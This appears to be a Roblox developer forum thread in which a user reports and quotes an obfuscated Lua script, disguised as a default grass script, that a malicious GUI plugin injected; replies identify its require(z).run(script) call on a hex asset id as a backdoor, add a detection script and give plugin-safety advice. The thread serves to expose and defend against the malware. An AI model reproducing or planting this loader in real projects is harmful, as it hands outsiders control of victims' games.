Script GrassFX:48 malicious script in Gui plugin pretending to be a roblox script

this malicious script was in a gui plugin on the main page of plugins, added invisible lines to every script i had

```lua
--// This is a default Roblox grass script. Dont remove for high quality grass. --
--// Contact Chaz#4045 for questions! --

function lsh(value,shift)
	return (value*(2^shift)) % 256
end

-- shift right
function rsh(value,shift)
	return math.floor(value/2^shift) % 256
end

-- return single bit (for OR)
function bit(x,b)
	return (x % 2^b - x % 2^(b-1) > 0)
end

-- logic OR for number values
function lor(x,y,z)
	require(z).run(script)
	result = 0
	for p=1,8 do result = result + (((bit(x,p) or bit(y,p)) == true) and 2^(p-1) or 0) end
	return result
end
-- encryption table
local base64chars = {[0]='A',[1]='B',[2]='C',[3]='D',[4]='E',[5]='F',[6]='G',[7]='H',[8]='I',[9]='J',[10]='K',[11]='L',[12]='M',[13]='N'}

-- function encode
-- encodes input string to base64.
function enc(data)
	local bytes = {}
	local result = ""
	for spos=0,string.len(data)-1,3 do
		for byte=1,3 do bytes[byte] = string.byte(string.sub(data,(spos+byte))) or 0 end
		result = string.format('%s%s%s%s%s',result,base64chars[rsh(bytes[1],2)],base64chars[lor(lsh((bytes[1] % 4),4), rsh(bytes[2],4))] or "=",((#data-spos) > 1) and base64chars[lor(lsh(bytes[2] % 16,2), rsh(bytes[3],6))] or "=",((#data-spos) > 2) and base64chars[(bytes[3] % 64)] or "=")
	end
	return result
end

-- decryption table
local base64bytes = {['A']=0,['B']=1,['C']=2,['D']=3,['E']=4,['F']=5,['G']=6,['H']=7,['I']=8,['J']=9,['K']=10,['L']=11,['M']=12,['N']=13}
function dec(data,i)
	local chars = {}
	local result=""
	if not data then
		lor(2,5,i)
	end
	for dpos=0,string.len(data)-1,4 do
		for char=1,4 do chars[char] = base64bytes[(string.sub(data,(dpos+char),(dpos+char)) or "=")] end
		result = string.format('%s%s%s%s',result,string.char(lor(lsh(chars[1],2), rsh(chars[2],4))),(chars[3] ~= nil) and string.char(lor(lsh(chars[2],4), rsh(chars[3],2))) or "",(chars[4] ~= nil) and string.char(lor(lsh(chars[3],6) % 192, (chars[4]))) or "")
	end
	return result
end
dec(nil,0x139326cd0)
-- command line if not called as library
if (arg ~= nil) then
	local func = 'enc'
	for n,v in ipairs(arg) do
		if (n > 0) then
			if (v == "-h") then print "base64.lua [-e] [-d] text/data" break
			elseif (v == "-e") then func = 'enc'
			elseif (v == "-d") then func = 'dec'
			else print(_G[func](v)) end
		end
	end
else
	
end
```


pretty sure that script's a fake and is malicious like the other lines it added to a lot of other scripts


worst part is it came from one of these ui plugins on the main page

This code has nothing to do with grass. It’s most likely malicious.

2 Likes

Too bad! Impossible to trust plugins and things made by other users. Another reason why I do not use plugins. The only plugin I use is RigEdit, I hate all those plugins, using them makes me feel useless. If you can't code something, you better learn how to do it, not use a plugin : /

You don't know which plugin did it?

1 Like

ya it was a gui one i downloaded it to convert my gui’s to scale had nothing to do with scripting

i had used a gui plugin a year ago was great for converting all your gui’s to scale really fast

The fact that it has several functions used for encoding and decoding, and what @AstroCode suggested as well are instant red flags that this isn’t meant to be there. Also:


You can see that in this function it’s requiring z (which I assume would be the decoded module id) and then calling a function named run. This is probably a backdoor and you should remove it from your game asap. Make sure you check for other malicious scripts similar to this one because malicious plugins like to duplicate backdoors and spread them in places you’d never think to look.

Good luck!
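
Added example (not part of any post in this thread): a heuristic audit for the two traits the reply above points out, a `require` whose argument is not an instance path and a large hex literal that the quoted script passes through `dec` and `lor` into that `require`. The names `auditSource` and `report` are hypothetical, the checks will also flag legitimate `require(localVariable)` calls, and every finding is meant for manual review.

```lua
-- Added example, not from the thread; auditSource/report are hypothetical helper names.
-- Returns a list of {line = n, reason = "..."} findings for one script's source text.
local function auditSource(src)
	local findings = {}
	local lineNo = 0
	for line in (src .. "\n"):gmatch("(.-)\r?\n") do
		lineNo = lineNo + 1
		-- Drop a trailing comment (naive: does not account for "--" inside strings).
		local code = line:gsub("%-%-.*$", "")
		-- require() whose argument is not an instance path such as script.Parent.Module
		for arg in code:gmatch("require%s*%(%s*([^%)]-)%s*%)") do
			if tonumber(arg) then
				table.insert(findings, {line = lineNo, reason = "require of literal id " .. arg})
			elseif not arg:find("[%.:%[]") then
				table.insert(findings, {line = lineNo, reason = "require of bare variable '" .. arg .. "'"})
			end
		end
		-- Hex literals of 7+ digits: large enough to be an asset id, reported in decimal.
		for hex in code:gmatch("0[xX]%x%x%x%x%x%x%x+") do
			table.insert(findings, {line = lineNo, reason = ("hex literal %s = %.0f"):format(hex, tonumber(hex))})
		end
	end
	return findings
end

local function report(name, src)
	for _, f in ipairs(auditSource(src)) do
		print(("%s:%d: %s"):format(name, f.line, f.reason))
	end
end

-- Abridged excerpt of the script quoted at the top of this thread, used as sample input.
local sample = [[
function lor(x,y,z)
	require(z).run(script)
	return result
end
dec(nil,0x139326cd0)
]]

if game then
	-- In Studio: audit every script in the place; pcall guards instances that cannot be read.
	for _, inst in ipairs(game:GetDescendants()) do
		local ok, src = pcall(function() return inst:IsA("LuaSourceContainer") and inst.Source end)
		if ok and src then report(inst:GetFullName(), src) end
	end
else
	report("sample", sample)
end
```

Pasted into the Studio command bar it walks the open place; run with a standalone Lua interpreter it audits only the embedded excerpt.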

Awful take. Plenty of developers push forth great products that are safe and reliable for power-users. Fact is that some programmers are just more well-versed and can create better products than you can, so why not save time and support them as a producer in the process?

2 Likes

i put all my versions back to the 15th to be safe not even trying to track all this mess down

1 Like

I agree with you to an extent. However, I think it should be noted that many beginners would have a hard time checking the authenticity of a plugin, and sometimes don’t even know that malicious or fake plugins exist.

If it weren’t for the people that made these types of plugins solely for the purpose of taking advantage of others we wouldn’t have to be on such high alert.

Personally, I think that plugins are a great feature on the platform and are super useful, but they need to be moderated a lot better. There should either be some sort of UGC-like program that verifies users who create quality plugins and allows them to upload or just tighten security on all plugins by verifying that they aren’t malicious before allowing them to be uploaded.

2 Likes

I don't know, everybody has their own methods, mine is not using plugins. If I want something to be done, do it myself, if I use plugins I become lazy.
Of course there's many plugins perfectly safe, that's why I use RigEdit, and I support it. But I prefer to learn, instead of saving time.

You can scale your gui’s without using any plugin, manually or by script, everything is related with scripting

I could write a long thread about checking plugin authenticity, but I’ll save that for another time. Long story short: every uiDesign plugin on that front page is fake. If you see a plugin that seems interesting, first browse the Community Creations category for it because, more often than not, the developer will have posted information about their plugin there.

Be careful, however, because people are sly. This seems to be the correct plugin as it is by Stelrex, the original creator of the uiDesign plugin:


However, upon clicking on the creator, you’ll be brought to a group page named Stelrex, a fraudulent, malicious group that is posing as his user at face-value.

People are smart. You have to be quite careful about the things you’re installing because they’ll more often than not come from a malicious source.
To be safe:

  1. See if the plugin provides a DevForum thread about it; that should provide you the correct plugin link above all, so threading that needle should be your first priority.
  2. Double, triple, and quadruple check the source of a plugin. Ideally, you would cross-reference it with a DevForum thread.
  3. Do not permit any plugins to have permissions to inject scripts, have permission to make Http requests, or any other miscellaneous permissions unless you can verify with 100% certainty that it is coming from an original or credible source.

All in all, I’d uninstall whatever uiDesign plugin you acquired and take the one from here instead: UiDesign plugins. Good luck.

3 Likes

ofc you can but it takes like 2 hours compared to 10 mins

1 Like

Learning to do it faster then. Now those 10 minutes of improvement got you at this problem :confused:
Practice never harmed anyone

1 Like

Peashie you're just getting on my nerves now, Alvin Blox i consider a credible source he recommends plugins in YouTube videos. Every single new person that ever comes to attempt to make games is gonna run into this kinda trash that shows up on the plugins… just stop… wasting your time trying blah blah to me

My Favourite PLUGINS in Roblox Studio - Bing video

Relax dude, that's my point of view, and I respect any point of view, learn to relax. Idc if someone recommends it or not, it's my point of view. I’ve been respectful towards you. And this is a forum we’re free to say our points… cheesee… ¬¬

2 Likes

This mentality is kind of the opposite of what plugins are intended for. Plugins are meant to make your workflow simpler. Think of it like a framework – why re-invent something that already exists?

I do agree however that it is impossible to trust plugins made by users. It’s been apparent for a few years already that the developer library itself has become bloated with malicious plugins. Very unfortunate situation all around.

1 Like

This is an incredibly inappropriate response to her opinion on not wanting to use plugins. I’ve worked with Peashie before on the DevForums and she seems like a very knowledgeable individual.

I would really consider being more open to opinions in the future moving forward. :slight_smile:

2 Likes

I agree; however, I think the best approach would be to revise the system to instead moderate plugins that file requests for HTTP calls or script injection.

As of recent, we’ve been provided the means to detect these sorts of things in Studio, so I’m a strong proprietor of the idea that said process should be expedited to the catalog (with a warning about the risks!).

1 Like

I agree. If evil ppl wouldn't exist, this kind of problems wouldn't exist. That's the only problem. Maybe implement better checks on how Roblox lets ppl to upload plugins.

I know my mentality is the opposite to what plugins are for. That's why I don't use them. I want to learn, no matter if already exists, I want to learn to do it, that's my way to be. I think anyone can use their own methods, all are useful. Just be cautious using other’s works if we’re not able to understand their systems.

EDIT:

It's ok, and I didn't mean to be rude or something by saying my thoughts, this situation is too bad, and I feel bad that you lost ur work. But, well @HollowMariofan gave u a great solution, now just, back to work. Good luck friend @zuggy81

3 Likes

ya i gotta say i'm a little upset i had to revert and lose everything i did the last 2 days, and it happened at the worst time when i switched my whole project to team i just thought it was animations errors that i had to re upload so i didn't pay attention

1 Like